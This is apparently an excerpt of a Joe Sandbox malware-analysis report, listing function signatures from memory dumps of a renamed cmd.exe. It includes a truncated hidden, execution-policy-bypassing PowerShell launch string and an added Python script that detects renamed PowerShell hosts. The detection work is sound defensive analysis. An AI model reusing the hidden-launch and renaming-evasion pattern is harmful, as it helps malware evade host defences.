                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                            • String ID: "$=,;
                                                                                                            • API String ID: 3545743878-4143597401
                                                                                                            • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                            • Instruction ID: e02a97cddb360842923323276f60a60ef058ce16de8d5a542898f159f2ebc558
                                                                                                            • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                            • Instruction Fuzzy Hash: 12C1A365A08E5289EBA57B159080379F6A1FF4DF64F849235CE5E32394EF3CA44DC230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                            • API String ID: 1741086925-759476645
                                                                                                            • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction ID: c7f81955cdff20067df238b0ddb5d7db7fc413d33bddc3bf9f4deecae0fc1fa8
                                                                                                            • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                            • Instruction Fuzzy Hash: 8B418674122D6AF0FE04DB55E86EED82727A7E574DFC044A3B50A1617A9F7C824DC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentFormatMessageThread
                                                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                            • API String ID: 2411632146-3173542853
                                                                                                            • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                            • Instruction ID: 092b5d46aefba5b7d98731528cb389fef54fced99227d423d8143bbc78d7a6c7
                                                                                                            • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                            • Instruction Fuzzy Hash: F8616C71A09E42C5EBA4EB51A4045B9A7E0FF44BA8FC80136DD4D2B754CF3EE5698730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                            • String ID: d
                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                            • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction ID: 27b2178dc2995045d5769150ebd24a0060d458fe62719d9a81dcdb5bedbe776c
                                                                                                            • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                            • Instruction Fuzzy Hash: AD517B72205B58E6FB50CB62E458BD9B7A2F7D9B98F848124EB4A07B18DF38C0598740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile_open_osfhandle
                                                                                                            • String ID: con
                                                                                                            • API String ID: 2905481843-4257191772
                                                                                                            • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                            • Instruction ID: 2790992f76e87b3049637e50cd0f4b5e598ebaf39b789b868170f784eaf516f2
                                                                                                            • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                            • Instruction Fuzzy Hash: 2371B676608A818AE7A0AF14E440679FAA4FB8DB70F944234DA6E527D4DF3DD44DCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3829876242-3916222277
                                                                                                            • Opcode ID: f4952ccc81e9fcc75ba476bb44cabcc8e232d9e47a520838f14b2d4a8637c121
                                                                                                            • Instruction ID: ad255a79f1d9856a54b513f0468c1b248688e0909ca755c8f552af04d18616f2
                                                                                                            • Opcode Fuzzy Hash: f4952ccc81e9fcc75ba476bb44cabcc8e232d9e47a520838f14b2d4a8637c121
                                                                                                            • Instruction Fuzzy Hash: 99618036A08E428AEB94AB11941017EF6E4FFC9B64F858134DE1E27794DF3DE51D8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                            • String ID: CSVFS$NTFS$REFS
                                                                                                            • API String ID: 3510147486-2605508654
                                                                                                            • Opcode ID: 0ee8c208da2ed77d277b3b8165e731868a5eb32fb0ce304e78f4d7262e372441
                                                                                                            • Instruction ID: 265e23a952d721fe9fff7d30e809ab0459430804060d3406e22a8fbb92750e1e
                                                                                                            • Opcode Fuzzy Hash: 0ee8c208da2ed77d277b3b8165e731868a5eb32fb0ce304e78f4d7262e372441
                                                                                                            • Instruction Fuzzy Hash: E3617E32708FC28AEBA19F21D8453E9B7A4FB49B94F844135CA4D5BB58DF79D208C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • longjmp.MSVCRT(?,00000000,00000000,00007FF7137E7279,?,?,?,?,?,00007FF7137EBFA9), ref: 00007FF713804485
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: longjmp
                                                                                                            • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                            • API String ID: 1832741078-366822981
                                                                                                            • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                            • Instruction ID: 23e41ca1f11c1c34f5171874e789c536a23edfa158ec564796a8d44a4717168d
                                                                                                            • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                            • Instruction Fuzzy Hash: 2DC1AF60E0CE8285E7E4BB5A55805B8E7E1AB4ABA4FD40136CD0D7B691CF3EA45D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heapwcschr$AllocateProcessmemset
                                                                                                            • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                            • API String ID: 2060774286-969133440
                                                                                                            • Opcode ID: 5a97b88e3d91fa77f019465bf968588e8ce7d313c2801e2b530795d61cd4474f
                                                                                                            • Instruction ID: e4c6cc33e5b9f1d1e9c4084e4eab51b4bfff61f345595b2c73dcb0cc1c3620b5
                                                                                                            • Opcode Fuzzy Hash: 5a97b88e3d91fa77f019465bf968588e8ce7d313c2801e2b530795d61cd4474f
                                                                                                            • Instruction Fuzzy Hash: FAB19121A0DE5281EAE0AB1590C4279EAA4FF4CBA4FD54235CA5E777A4DF3CE44D8730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ$NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){$xCaUG=[System.Secu
                                                                                                            • API String ID: 0-4065707121
                                                                                                            • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                            • Instruction ID: 7704f55d04948e57bb06a3cd7ee0e9b7508db2ed126e087ec523da9662d49f1d
                                                                                                            • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                            • Instruction Fuzzy Hash: 7C51A024A0CE0386F794BF25A440279A7A8BF49B65FC04034C62E772A4DF3DA01CC370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                            • String ID: 0123456789$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 1606811317-1547122264
                                                                                                            • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                            • Instruction ID: 4cd2226dfbf97b36ac790705269bb31e163a12c788bb39a3c84630491c63359e
                                                                                                            • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                            • Instruction Fuzzy Hash: 93D19121A08E4281E790AB15A884679F7A0FF49BB0FD54231DA6E337A5DF3DE41DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
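The strings in the function above are the report's clearest evidence for the "Renames powershell.exe to bypass HIPS" and "Drops executables to the windows directory (C:\Windows) and starts them" signatures: a PowerShell host copied to C:\Windows\ as `$sxr-powershell.exe` (the dump itself is the renamed `$sxr-cmd`) and launched with `-WindowStyle hidden -ExecutionPolicy bypass -Command ...`. The script below is an added example for this page, not Joe Sandbox or sample code, that turns that pattern into indicators over (image, command line) pairs as found in Sysmon Event ID 1 or Security 4688 records. The sample events are constructed, the switch regexes, the 1024-character length threshold and the C:\Windows\ allowlist are assumptions, and the report's truncated command tail is replaced by filler rather than reconstructed.

```python
"""Triage process-creation events for the renamed-host pattern seen in this report.

Added example, not Joe Sandbox or sample code. Indicators are derived from the
strings visible above: a PowerShell host copied to C:\\Windows\\ under a
'$sxr-' style name and run with '-WindowStyle hidden -ExecutionPolicy bypass'.
Thresholds, allowlists and sample events are assumptions/constructed.
"""
import ntpath
import re
from typing import Dict, List, Tuple

# Binaries that legitimately accept the PowerShell switch set matched below.
KNOWN_POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Illustrative (incomplete) set of executables normally present directly in
# C:\Windows\; build the real list from a clean reference image.
WINDOWS_ROOT_ALLOWLIST = {
    "explorer.exe", "regedit.exe", "notepad.exe", "hh.exe", "write.exe",
    "splwow64.exe", "winhlp32.exe", "bfsvc.exe", "helppane.exe",
}

# Switches from the report's command line, with their common abbreviations.
EXEC_POLICY_BYPASS = re.compile(r"-(?:ex|ep|exec|executionpolicy)\s+(?:bypass|unrestricted)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I)
NO_PROFILE = re.compile(r"-(?:nop|noprofile)\b", re.I)
COMMAND_SWITCH = re.compile(r"-(?:c|command|e|ec|enc|encodedcommand)\b", re.I)
PS_SWITCHES = (EXEC_POLICY_BYPASS, HIDDEN_WINDOW, NO_PROFILE, COMMAND_SWITCH)

LONG_CMDLINE_THRESHOLD = 1024  # assumed; tune per environment


def triage_process_event(image: str, cmdline: str) -> List[str]:
    """Return indicator names for one process-creation event (empty = nothing seen)."""
    findings: List[str] = []
    base = ntpath.basename(image).lower()
    parent = ntpath.dirname(image).lower().rstrip("\\")

    # PowerShell-only switch set on a binary that is not a known PowerShell host.
    ps_switch_hits = sum(1 for p in PS_SWITCHES if p.search(cmdline))
    if ps_switch_hits >= 2 and base not in KNOWN_POWERSHELL_HOSTS:
        findings.append("renamed_powershell_host")

    # Executable placed directly in C:\Windows\ rather than a system subfolder.
    if parent == r"c:\windows" and base not in WINDOWS_ROOT_ALLOWLIST:
        findings.append("image_in_windows_root")

    # '$sxr-' style naming: no stock Windows binary starts with '$'.
    if base.startswith("$"):
        findings.append("dollar_prefixed_image")

    if EXEC_POLICY_BYPASS.search(cmdline):
        findings.append("execution_policy_bypass")
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden_window")
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        findings.append("long_command_line")
    return findings


def severity(findings: List[str]) -> str:
    """Collapse indicators into a triage verdict (cut-offs are assumptions)."""
    if "renamed_powershell_host" in findings:
        return "high"
    if "image_in_windows_root" in findings and len(findings) >= 2:
        return "medium"
    return "low" if findings else "none"


def triage_events(events: List[Tuple[str, str]]) -> Dict[str, Tuple[str, List[str]]]:
    """Map each image path to (verdict, indicators)."""
    result: Dict[str, Tuple[str, List[str]]] = {}
    for image, cmd in events:
        found = triage_process_event(image, cmd)
        result[image] = (severity(found), found)
    return result


# Constructed sample events (not taken from the report's process tree). The
# first repeats the visible prefix of the report's command line; the payload
# tail, which the report truncates, is replaced by filler so the length matches
# the "Very long command line" signature.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\$sxr-powershell.exe",
     r"C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive "
     r"-WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF "
     + "A" * 3000),
    (r"C:\Windows\$sxr-cmd.exe", r"C:\Windows\$sxr-cmd.exe /c set x=1"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command Get-Process"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for image, (verdict, found) in triage_events(SAMPLE_EVENTS).items():
        print(f"{verdict:6} {image}  {found}")
```

The `renamed_powershell_host` check deliberately keys on the switch combination rather than the file name, so it still fires when the attacker picks a name without the `$sxr-` prefix; the name and directory checks are kept as separate indicators so the verdict degrades gracefully rather than depending on one string from this sample.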

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorLast$InformationVolume
                                                                                                            • String ID: %04X-%04X$~
                                                                                                            • API String ID: 2748242238-2468825380
                                                                                                            • Opcode ID: a5ce13b1ba1f32e436565888f02c3858eb1c7aaee3f3737ac5e2d6980773bf1f
                                                                                                            • Instruction ID: 420ccf5dcd1f3a927bc7b6f949e26f651bc8a293678dd680b1fdae5c9e3b3cde
                                                                                                            • Opcode Fuzzy Hash: a5ce13b1ba1f32e436565888f02c3858eb1c7aaee3f3737ac5e2d6980773bf1f
                                                                                                            • Instruction Fuzzy Hash: F7A1B672708FC2CAEBA5AF2098402E9B7A5FB85794F808134D94D6B748DF3DD659C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                            • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                            • API String ID: 2348642995-441775793
                                                                                                            • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                            • Instruction ID: 9bcd74b0017ff77809c739a3fd2d783c2818cbbb38958aeea06e1c1faf29275e
                                                                                                            • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                            • Instruction Fuzzy Hash: 41716D62D08E4686E7A06F25D490179F7A4FB49BB4FD4C039DA5E26294EF3CA48CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
